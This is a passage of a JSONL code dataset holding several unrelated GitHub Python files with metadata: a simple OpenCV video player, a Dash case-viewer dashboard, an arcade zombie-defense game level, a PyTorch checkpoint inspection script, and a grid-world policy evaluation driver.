stack_pointer], k]\n\n", "repo_name": "epfl-lara/treenet", "sub_path": "treenet/treenet.py", "file_name": "treenet.py", "file_ext": "py", "file_size_in_byte": 5420, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 4, "usage_type": "name"}, {"api_name": "torch.abs", "line_number": 128, "usage_type": "call"}]}
+{"seq_id": "14904314118", "text": "import cv2\nimport numpy as np\n\nvideo = str(input(\"input an mp4 file\"))\ncapture = cv2.VideoCapture(video)\n\nif (capture.isOpened()==False):\n print(\"something went wrong!!\\ntry again\")\n\nwhile(capture.isOpened()):\n\n ret,frame=capture.read()\n if ret==True:\n cv2.imshow(\"Frame\",frame)\n if cv2.waitkey(25) and 0xFF==ord(\"q\"):\n break\n else:\n break\ncapture.release()\ncv2.destroyAllWindows()", "repo_name": "Nmuhra/media-player", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.VideoCapture", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.waitkey", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "4747727018", "text": "from app import app\nfrom bases.CasesDiv import Cases\nfrom db.CaseCalls import CaseCalls\nfrom handler.CaseHandler import CaseHandler\nfrom stemmons.Stemmons_Dash import Stemmons_Dash_App\n#from stemmons \nimport stemmons_dash_table as sdt\nfrom stemmons import stemmons_dash_components as sdc\n\nimport urllib\nimport pandas as pd\nfrom flask import request \nfrom dash.dependencies import Input, Output, State, MATCH, ALL\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash\n\nimport time\n\n\ntabs = dbc.Tabs(\n [\n dbc.Tab(label='Current', tab_id='Current'),\n dbc.Tab(label='Lifetime', tab_id='Lifetime'),\n #dbc.Tab(label='Hopper', tab_id='Hopper'),\n #dbc.Tab(label='Team', tab_id='Team'),\n #dbc.Tab(label='Relationships', tab_id='Relationships'),\n \n ],\n id='cases-tabs',\n active_tab='Current'\n \n )\n\n\ncolumns = ['Case ID', 'Case Title', 'Case Type', 'System Status', 'Due Status', 'Due Date', 'Created Date', \n 'Last Modified Date', 'Closed Date', 'Case Life Days', 'Created By', 'Assigned To', 'Owner', 'Last Modified By']\n\n\n\nlayout = html.Div([\n tabs, \n dbc.Spinner(id='content-1-cases'),\n html.Div(id='content-2-cases'),\n #dcc.Interval(id='clock-cases', max_intervals=1, interval=1),\n\n dcc.Store(id='user-cases', storage_type='memory'),\n dcc.Store(id='hopper-cases', storage_type='memory'),\n dcc.Store(id='team-cases', storage_type='memory'),\n\n # used for sharing data between callbacks\n html.Div(id='table-data', style={'display':'none'}),\n html.Div(id='filtered-data', style={'display':'none'}),\n html.Div(id='sorted-data', style={'display':'none'}),\n html.Div(id='previous-header-clicks', style={'display':'none'})\n])\n\n\n\n #user = request.cookies['user']\n #cases = Cases(user) \n\n\n@app.callback(\n Output('cases-tabs', 'children'),\n #[Input('clock-cases', 'n_intervals')],\n [Input('param_user', 'data')],\n [State('cases-tabs', 'children')]\n)\ndef append_tabs(user, cases_tabs):\n if user is None:\n raise dash.exceptions.PreventUpdate\n\n hoppers = CaseCalls().query_hopper(user)\n if len(hoppers)>0:\n cases_tabs.append(dbc.Tab(label='Hopper', tab_id='Hopper'))\n\n supervisees = CaseCalls().query_team(user)['SHORT_USER_NAME'].unique()\n if len(supervisees)>0:\n cases_tabs.append(dbc.Tab(label='Team', tab_id='Team'))\n\n return cases_tabs\n\n\n\n''' add Hopper tab when user has hoppers,\nadd Team tab when user has supervisees '''\n@app.callback(\n [Output('user-cases', 'data'), Output('hopper-cases', 'data'), Output('team-cases', 'data')],\n #[Input('clock-cases', 'n_intervals')],\n [Input('param_user', 'data')]\n)\ndef store(user):\n if user is None:\n raise dash.exceptions.PreventUpdate\n \n #user = request.cookies['user']\n cases = Cases(user)\n\n user_cases = cases.get_case_list()\n hopper_cases = cases.get_case_list('Hopper')\n team_cases = cases.get_case_list('Team')\n\n return CaseHandler().to_json(user_cases), CaseHandler().to_json(hopper_cases), CaseHandler().to_json(team_cases)\n\n\n''' pick data according to selected tab,\nshow table header first '''\n@app.callback(\n [Output('content-2-cases', 'children'), \n Output('table-data', 'children')],\n [Input('param_user', 'data'), \n Input('cases-tabs', 'active_tab'), \n Input('user-cases', 'data'), \n Input('hopper-cases', 'data'), \n Input('team-cases', 'data')]\n)\ndef index(user, selection, user_cases, hopper_cases, team_cases):\n if user is None: \n raise dash.exceptions.PreventUpdate\n\n cases = Cases(user)\n user_cases = pd.read_json(user_cases, orient='split')\n\n if selection == 'Current':\n ''' assume null system code is not closed case '''\n case_list = user_cases[user_cases['STATUS_SYSTEM_CODE'].fillna('')!='CLOSE'].reset_index(drop=True)\n #case_list = CaseHandler().security(case_list)\n return cases.table(columns), CaseHandler().to_json(case_list)\n \n elif selection == 'Lifetime':\n ''' not showing Last Modified cases in Lifetime '''\n case_list = user_cases[(user_cases['CREATED_BY_SAM'].str.lower()==user.lower()) | \n (user_cases['ASSIGNED_TO_SAM'].str.lower()==user.lower()) |\n (user_cases['OWNER_SAM'].str.lower()==user.lower())].reset_index(drop=True)\n #case_list = CaseHandler().security(case_list)\n return cases.table(columns), CaseHandler().to_json(case_list)\n\n elif selection == 'Hopper':\n #hopper_cases = pd.read_json(hopper_cases, orient='split')\n #hopper_cases = CaseHandler().security(hopper_cases)\n #return cases.table(columns), CaseHandler().to_json(hopper_cases)\n return cases.table(columns), hopper_cases\n\n elif selection == 'Team':\n #team_cases = pd.read_json(team_cases, orient='split')\n #team_cases = CaseHandler().security(team_cases)\n #return cases.table(columns), CaseHandler().to_json(team_cases)\n return cases.table(columns), team_cases\n\n elif selection == 'Relationships':\n return 'Relationships', None\n\n\n''' \nfilter table,\nand according to filtered table data adjusting graphs '''\n@app.callback(\n [Output('content-1-cases', 'children'), \n Output('filtered-data', 'children')],\n [Input('param_user', 'data'),\n Input('cases-tabs', 'active_tab'), \n Input('table-data', 'children'), \n Input({'type': 'filter', 'colname': ALL}, 'value'), \n Input({'type': 'filter', 'colname': ALL}, 'id')]\n)\ndef filter(user, selection, data, filter_values, filter_ids):\n if user is None: \n raise dash.exceptions.PreventUpdate\n if data is None:\n return dbc.Col('No Data Available!'), None\n \n data = pd.read_json(data, orient='split')\n data = sdt.filter_table(data, filter_values, filter_ids, url_col=['Case Title']) \n \n cases = Cases(user)\n \n if selection == 'Current':\n #should look like cases.current(*args,**kwargs)\n return cases.current(data), data.to_json(orient='split')\n \n elif selection == 'Lifetime':\n #should look like cases.lifetime(*args,**kwargs)\n return cases.lifetime(data), data.to_json(orient='split')\n\n elif selection == 'Hopper':\n #should look like cases.hopper(*args,**kwargs)\n return cases.hopper(data), data.to_json(orient='split')\n\n elif selection == 'Team':\n #should look like cases.hopper(*args,**kwargs)\n return cases.team(data), data.to_json(orient='split')\n\n elif selection == 'Relationships':\n #should look like cases.relationships(*args,**kwargs)\n return 'Relationships'\n\n\n''' \nclick on column names to sort table\nodd number of times: ascending, even number of times: descending \n\nwhen table data is too big, only show the first 1000 rows\n'''\n@app.callback(\n [Output('table-body', 'children'), \n Output('download-link-table', 'href'), \n Output('previous-header-clicks', 'children')],\n [Input('filtered-data', 'children'), \n Input({'type': 'header', 'colname': ALL}, 'n_clicks'), \n Input({'type': 'header', 'colname': ALL}, 'id')],\n [State('previous-header-clicks', 'children')]\n)\ndef sort(data, header_clicks, header_ids, previous_header_clicks):\n if data is None: \n raise dash.exceptions.PreventUpdate \n\n data = pd.read_json(data, orient='split')\n \n ''' only show \"security\" cases '''\n ''' cases will not show in tables, but will count into statistic graphs'''\n data = CaseHandler().security(data)\n \n data['Case Title'] = data.apply(lambda row: [row['Case Title'], row['Case URL']], axis=1)\n data = data[columns]\n data = data.sort_values(['Case Type', 'Case ID'], ascending=[True, False]).reset_index(drop=True)\n data = sdt.sort_table(data, header_clicks, header_ids, previous_header_clicks, url_col=['Case Title'])\n\n download_csv = 'data:text/csv;charset=utf-8,' + urllib.parse.quote(data.to_csv(index=False, encoding='utf-8'))\n return sdt.generate_table_body(data.head(1000), url_col=['Case Title']), download_csv, header_clicks", "repo_name": "boxer-xian/Stemmons-Person-Viewer", "sub_path": "tabs/Cases.py", "file_name": "Cases.py", "file_ext": "py", "file_size_in_byte": 8269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dash_bootstrap_components.Tabs", "line_number": 22, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Tab", "line_number": 24, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Tab", "line_number": 25, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 42, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 44, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 45, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 48, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 49, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 50, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 54, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 55, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 56, "usage_type": "call"}, {"api_name": "dash.exceptions", "line_number": 73, "usage_type": "attribute"}, {"api_name": "db.CaseCalls.CaseCalls", "line_number": 75, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Tab", "line_number": 77, "usage_type": "call"}, {"api_name": "db.CaseCalls.CaseCalls", "line_number": 79, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Tab", "line_number": 81, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 65, "usage_type": "call"}, {"api_name": "app.app", "line_number": 65, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 66, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 68, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 69, "usage_type": "call"}, {"api_name": "dash.exceptions", "line_number": 96, "usage_type": "attribute"}, {"api_name": "bases.CasesDiv.Cases", "line_number": 99, "usage_type": "call"}, {"api_name": "handler.CaseHandler.CaseHandler", "line_number": 105, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 89, "usage_type": "call"}, {"api_name": "app.app", "line_number": 89, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 90, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 92, "usage_type": "call"}, {"api_name": "dash.exceptions", "line_number": 121, "usage_type": "attribute"}, {"api_name": "bases.CasesDiv.Cases", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 124, "usage_type": "call"}, {"api_name": "handler.CaseHandler.CaseHandler", "line_number": 130, "usage_type": "call"}, {"api_name": "handler.CaseHandler.CaseHandler", "line_number": 138, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 110, "usage_type": "call"}, {"api_name": "app.app", "line_number": 110, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 111, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 112, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 113, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 114, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 115, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 116, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 117, "usage_type": "call"}, {"api_name": "dash.exceptions", "line_number": 170, "usage_type": "attribute"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 174, "usage_type": "call"}, {"api_name": "stemmons_dash_table.filter_table", "line_number": 175, "usage_type": "call"}, {"api_name": "bases.CasesDiv.Cases", "line_number": 177, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 159, "usage_type": "call"}, {"api_name": "app.app", "line_number": 159, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 160, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 161, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 162, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 163, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 164, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 165, "usage_type": "call"}, {"api_name": "dash.dependencies.ALL", "line_number": 165, "usage_type": "name"}, {"api_name": "dash.dependencies.Input", "line_number": 166, "usage_type": "call"}, {"api_name": "dash.dependencies.ALL", "line_number": 166, "usage_type": "name"}, {"api_name": "dash.exceptions", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pandas.read_json", "line_number": 219, "usage_type": "call"}, {"api_name": "handler.CaseHandler.CaseHandler", "line_number": 223, "usage_type": "call"}, {"api_name": "stemmons_dash_table.sort_table", "line_number": 228, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 230, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 230, "usage_type": "attribute"}, {"api_name": "stemmons_dash_table.generate_table_body", "line_number": 231, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 206, "usage_type": "call"}, {"api_name": "app.app", "line_number": 206, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 207, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 208, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 209, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 210, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 211, "usage_type": "call"}, {"api_name": "dash.dependencies.ALL", "line_number": 211, "usage_type": "name"}, {"api_name": "dash.dependencies.Input", "line_number": 212, "usage_type": "call"}, {"api_name": "dash.dependencies.ALL", "line_number": 212, "usage_type": "name"}, {"api_name": "dash.dependencies.State", "line_number": 213, "usage_type": "call"}]}
+{"seq_id": "38883154344", "text": "import arcade\nimport random\nimport math\nimport settings\n\n\nWIDTH = 800\nHEIGHT = 600\nMOVEMENT_SPEED = [-2, -3, -4, -5]\n\n\nclass Chapter3View(arcade.View):\n def __init__(self):\n super().__init__()\n global bullet_speed, background, images\n self.finish = False\n\n # Sprite Images\n background_image = 'Chapter 3 Sprites/background.jpg'\n player_image = 'Chapter 3 Sprites/player.png'\n gun_image = 'Chapter 3 Sprites/gun.png'\n enemy_image = 'Chapter 3 Sprites/zombie.png'\n\n images = [background_image, player_image, gun_image, enemy_image]\n\n background = arcade.Sprite(images[0],\n center_x=WIDTH/2,\n center_y=HEIGHT/2,\n scale=1)\n\n arcade.set_background_color(arcade.color.BLACK)\n self.total_time = 31.0\n\n self.player = arcade.Sprite(images[1],\n center_x=WIDTH/2,\n center_y=0,\n scale=0.18)\n\n self.base = arcade.Sprite(center_x=WIDTH/2, center_y=-375, scale=1)\n base_color = arcade.color.BATTLESHIP_GREY\n self.base.texture = arcade.make_soft_square_texture(WIDTH,\n base_color,\n outer_alpha=255)\n\n self.gun = arcade.Sprite(images[2],\n center_x=WIDTH/2,\n center_y=-15,\n scale=0.13)\n\n self.mouse = arcade.Sprite(center_x=100, center_y=100)\n self.mouse.texture = arcade.make_soft_circle_texture(10,\n arcade.color.RED,\n outer_alpha=10)\n\n self.enemies = arcade.SpriteList()\n\n self.bullets = arcade.SpriteList()\n bullet_speed = 50\n\n def on_draw(self):\n arcade.start_render()\n\n background.draw()\n self.enemies.draw()\n self.bullets.draw()\n self.base.draw()\n self.gun.draw()\n self.player.draw()\n self.mouse.draw()\n\n minutes = int(self.total_time) // 60\n seconds = int(self.total_time) % 60\n\n # Texts\n pause_display = \"Press ESC To Pause\"\n timer = f\"Time: {minutes:02d}:{seconds:02d}\"\n timer_ends = \"Mission Complete\"\n goal = \"Defend The Base\"\n end_msg = \"Click Enter to Advance\"\n\n messages = [pause_display, timer, timer_ends, goal, end_msg]\n\n arcade.draw_text(messages[0],\n 600,\n HEIGHT-40,\n arcade.color.WHITE,\n 15)\n\n if seconds == 0:\n self.finish = True\n\n if self.finish is False:\n arcade.draw_text(messages[1],\n 10,\n HEIGHT-40,\n arcade.color.WHITE,\n 30)\n else:\n arcade.draw_text(messages[2],\n 10,\n HEIGHT-40,\n arcade.color.WHITE,\n 30)\n if seconds >= 28 and seconds <= 31:\n arcade.draw_text(messages[3],\n WIDTH/2-160,\n HEIGHT-100,\n arcade.color.WHITE,\n 30)\n if self.finish is True:\n arcade.draw_text(messages[4],\n WIDTH/2-190,\n 100,\n arcade.color.WHITE,\n 30)\n\n def update(self, delta_time):\n self.bullets.update()\n self.enemies.update()\n self.gun.update()\n self.spawn_enemy()\n self.collision()\n\n if self.finish is False:\n self.total_time -= delta_time\n\n def spawn_enemy(self):\n global images\n if self.finish is False:\n if random.randrange(40) == 0:\n enemy = arcade.Sprite(images[3], scale=0.3)\n enemy.center_x = random.randrange(50, WIDTH-50)\n enemy.center_y = random.randrange(HEIGHT+50, HEIGHT*2)\n enemy.change_y = random.choice(MOVEMENT_SPEED)\n self.enemies.append(enemy)\n\n def collision(self):\n for enemy in self.enemies:\n bullets_in_contact = enemy.collides_with_list(self.bullets)\n if bullets_in_contact:\n enemy.kill()\n for bullet in bullets_in_contact:\n bullet.kill()\n\n for enemy in self.enemies:\n base_in_contact = self.base.collides_with_list(self.enemies)\n if base_in_contact:\n enemy.kill()\n gameover = GameoverView(self)\n self.window.show_view(gameover)\n\n def on_mouse_motion(self, x, y, delta_x, delta_y):\n self.mouse.center_x = x\n self.mouse.center_y = y\n\n # Allow gun to follow the direction of mouse\n self.gun.height = 300\n x_diff = x - self.gun.center_x\n y_diff = y - self.gun.center_y\n angle = math.atan2(y_diff, x_diff)\n self.gun.angle = math.degrees(angle)\n\n def on_mouse_press(self, x, y, button, key_modifiers):\n global bullet_speed\n bullet = arcade.Sprite('Chapter 3 Sprites/bullet.png', scale=0.02)\n bullet.center_x = WIDTH/2\n bullet.center_y = -10\n\n # Bullet facing at an angle\n x_diff = x - bullet.center_x\n y_diff = y - bullet.center_y\n angle = math.atan2(y_diff, x_diff)\n\n bullet.angle = math.degrees(angle)\n bullet.change_x = math.cos(angle) * bullet_speed\n bullet.change_y = math.sin(angle) * bullet_speed\n self.bullets.append(bullet)\n\n def on_key_press(self, key, _modifiers):\n if self.finish is True:\n if key == arcade.key.ENTER:\n self.director.next_view()\n if key == arcade.key.ESCAPE:\n pause = PauseView(self)\n self.window.show_view(pause)\n\n\nclass PauseView(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n\n def on_show(self):\n arcade.set_background_color(arcade.color.ORANGE)\n\n def on_draw(self):\n arcade.draw_text(\"PAUSED\", WIDTH/2, HEIGHT/2+50,\n arcade.color.WHITE, font_size=50, anchor_x=\"center\")\n\n arcade.draw_text(\"Press Esc. to return\",\n WIDTH/2,\n HEIGHT/2,\n arcade.color.WHITE,\n font_size=20,\n anchor_x=\"center\")\n arcade.draw_text(\"Press Enter to reset\",\n WIDTH/2,\n HEIGHT/2-30,\n arcade.color.WHITE,\n font_size=20,\n anchor_x=\"center\")\n\n def on_key_press(self, key, _modifiers):\n if key == arcade.key.ESCAPE:\n self.window.show_view(self.game_view)\n elif key == arcade.key.ENTER:\n game = Chapter3View()\n self.window.show_view(game)\n\n\nclass GameoverView(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n\n def on_show(self):\n arcade.set_background_color(arcade.color.ORANGE)\n\n def on_draw(self):\n arcade.draw_text(\"Game Over\", WIDTH/2, HEIGHT/2+50,\n arcade.color.RED, font_size=50, anchor_x=\"center\")\n\n arcade.draw_text(\"Press Enter to Try Again\",\n WIDTH/2,\n HEIGHT/2-30,\n arcade.color.RED,\n font_size=20,\n anchor_x=\"center\")\n\n def on_key_press(self, key, _modifiers):\n if key == arcade.key.ENTER:\n game = Chapter3View()\n self.window.show_view(game)\n\n\nif __name__ == \"__main__\":\n \"\"\"This section of code will allow you to run your View\n independently from the main.py file and its Director.\n You can ignore this whole section. Keep it at the bottom\n of your code.\n It is advised you do not modify it unless you really know\n what you are doing.\n \"\"\"\n from utils import FakeDirector\n window = arcade.Window(settings.WIDTH, settings.HEIGHT)\n my_view = Chapter3View()\n my_view.director = FakeDirector(close_on_next_view=True)\n window.show_view(my_view)\n arcade.run()\n", "repo_name": "ICS3U-Gallo/cpt-2019-harvardbtw", "sub_path": "chapter_3.py", "file_name": "chapter_3.py", "file_ext": "py", "file_size_in_byte": 8683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "arcade.View", "line_number": 12, "usage_type": "attribute"}, {"api_name": "arcade.Sprite", "line_number": 26, "usage_type": "call"}, {"api_name": "arcade.set_background_color", "line_number": 31, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 31, "usage_type": "attribute"}, {"api_name": "arcade.Sprite", "line_number": 34, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 39, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 40, "usage_type": "attribute"}, {"api_name": "arcade.make_soft_square_texture", "line_number": 41, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 45, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 50, "usage_type": "call"}, {"api_name": "arcade.make_soft_circle_texture", "line_number": 51, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 52, "usage_type": "attribute"}, {"api_name": "arcade.SpriteList", "line_number": 55, "usage_type": "call"}, {"api_name": "arcade.SpriteList", "line_number": 57, "usage_type": "call"}, {"api_name": "arcade.start_render", "line_number": 61, "usage_type": "call"}, {"api_name": "arcade.draw_text", "line_number": 83, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 86, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 93, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 96, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 99, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 102, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 105, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 108, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 111, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 114, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 130, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 131, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 132, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 133, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 134, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 160, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 161, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 165, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 172, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 174, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 175, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 176, "usage_type": "call"}, {"api_name": "arcade.key", "line_number": 181, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 183, "usage_type": "attribute"}, {"api_name": "arcade.View", "line_number": 188, "usage_type": "attribute"}, {"api_name": "arcade.set_background_color", "line_number": 194, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 194, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 197, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 198, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 200, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 203, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 206, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 209, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 214, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 216, "usage_type": "attribute"}, {"api_name": "arcade.View", "line_number": 221, "usage_type": "attribute"}, {"api_name": "arcade.set_background_color", "line_number": 227, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 227, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 230, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 231, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 233, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 236, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 241, "usage_type": "attribute"}, {"api_name": "arcade.Window", "line_number": 255, "usage_type": "call"}, {"api_name": "settings.WIDTH", "line_number": 255, "usage_type": "attribute"}, {"api_name": "settings.HEIGHT", "line_number": 255, "usage_type": "attribute"}, {"api_name": "utils.FakeDirector", "line_number": 257, "usage_type": "call"}, {"api_name": "arcade.run", "line_number": 259, "usage_type": "call"}]}
+{"seq_id": "41924847723", "text": "# -*- coding: utf-8 -*-\n\nimport torch\nimport torchvision.models as models\nfrom torchsummary import summary\nimport model.model as model\ndevice =torch.device(\"cuda:1\")\n#device=torch.device(\"cpu\")\nnet = model.choose_net(\"nested_unet\")\nnet = net(in_channel=3,out_channel=1)\nload = \"./check_point/nested_unetbatch4scale512.0epoch30.pth\"\nnet.load_state_dict(\n #torch.load(load,map_location=device)\n torch.load(load)\n\n)\n#net.to(device)\nindata=torch.FloatTensor(3,512,512)\n\n#summary(net,(3,512,512))\npara={}\nfor name,parameters in net.named_parameters():\n print(name,\":\",parameters.size())\n para[name]=parameters.detach().numpy()\nprint(para)\n\n", "repo_name": "Eggwardhan/Segmentation-of-colon-tumor-cells-based-on-pathological-images", "sub_path": "check_model.py", "file_name": "check_model.py", "file_ext": "py", "file_size_in_byte": 647, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.device", "line_number": 7, "usage_type": "call"}, {"api_name": "model.model.choose_net", "line_number": 9, "usage_type": "call"}, {"api_name": "model.model", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "15711709629", "text": "#!/usr/bin/env python\n\n# Greg Attra\n# 02/12/2022\n\n# Driver class for running policy evaluation in the grid world problem\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom lib.dynamic_programming.grid_world.grid_world import N_STATES, gw_dynamics, Action\nfrom lib.dynamic_programming.policy_iteration import policy_evaluation\n\n\ndef main():\n policy = np.ones((N_STATES, len(Action))) / float(len(Action))\n dynamics = gw_dynamics()\n values = policy_evaluation(policy, dynamics, N_STATES, len(Action)).reshape(\n int(np.sqrt(N_STATES)),\n int(np.sqrt(N_STATES)))\n \n plt.matshow(values)\n for (i, j), z in np.ndenumerate(values):\n plt.text(j, i, '{:0.1f}'.format(z), ha='center', va='center',\n bbox=dict(boxstyle='round', facecolor='white', edgecolor='0.3'))\n\n plt.gca().invert_yaxis()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "gbattra/deep-rl", "sub_path": "code/src/grid_world/run_policy_evaluation.py", "file_name": "run_policy_evaluation.py", "file_ext": "py", "file_size_in_byte": 914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.ones", "line_number": 16, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.N_STATES", "line_number": 16, "usage_type": "name"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.Action", "line_number": 16, "usage_type": "argument"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.gw_dynamics", "line_number": 17, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.policy_iteration.policy_evaluation", "line_number": 18, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.N_STATES", "line_number": 18, "usage_type": "argument"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.Action", "line_number": 18, "usage_type": "argument"}, {"api_name": "numpy.sqrt", "line_number": 19, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.N_STATES", "line_number": 19, "usage_type": "argument"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.N_STATES", "line_number": 20, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.matshow", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.ndenumerate", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
